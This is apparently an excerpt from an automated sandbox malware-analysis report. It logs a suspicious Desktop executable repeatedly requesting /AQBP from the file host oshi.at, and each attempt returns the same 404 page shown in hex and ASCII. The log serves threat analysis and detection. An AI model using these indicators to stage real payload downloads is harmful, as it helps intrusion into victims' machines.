                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:54 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.849747194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:56 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:57 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:57 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:57 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.849748194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:59 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:00 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:00 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:00 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          33192.168.2.849749194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:02 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:03 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:03 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:03 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.849750194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:05 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:06 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:06 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:06 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.849751194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:08 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:09 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:08 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:09 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.849752194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:11 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:12 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:11 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:12 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.849753194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:14 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:15 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:15 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:15 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.849754194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:17 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:18 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:18 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:18 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.849755194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:20 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:21 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:21 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:21 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.849756194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:23 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:24 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:24 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:24 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          41192.168.2.849757194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:26 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:27 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:27 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:27 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          42192.168.2.849758194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:29 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:30 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:29 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          43192.168.2.849759194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:32 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:33 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:32 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:33 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          44192.168.2.849760194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:35 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:36 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:35 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:29:36 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          45192.168.2.849761194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:29:38 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:29:38 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:29:38 GMT
